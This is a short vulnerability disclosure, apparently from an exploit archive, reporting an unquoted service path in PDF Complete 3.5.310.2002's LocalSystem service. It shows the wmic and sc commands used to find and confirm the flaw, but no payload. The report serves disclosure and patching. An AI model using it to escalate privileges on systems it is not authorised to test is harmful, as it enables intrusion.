PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path

# Exploit Title: PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path
# Discovery by: Zaira Alquicira
# Discovery Date: 2020-12-10
# Vendor Homepage:  https://pdf-complete.informer.com/3.5/
# Tested Version: 3.5.310.2002
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "pdfsvc" | findstr /i /v
"""

PDF Complete

PDF Complete  C:\Program Files (x86)\PDF Complete\pdfsvc.exe
/startedbyscm:66B66708-40E2BE4D-pdfcService
Auto


# Service info:

C:\Users\TOSHIBA>sc qc "pdfcDispatcher"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: pdfcDispatcher
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe
/startedbyscm:66B66708-40E2BE4D-pdfcService
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : PDF Document Manager
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem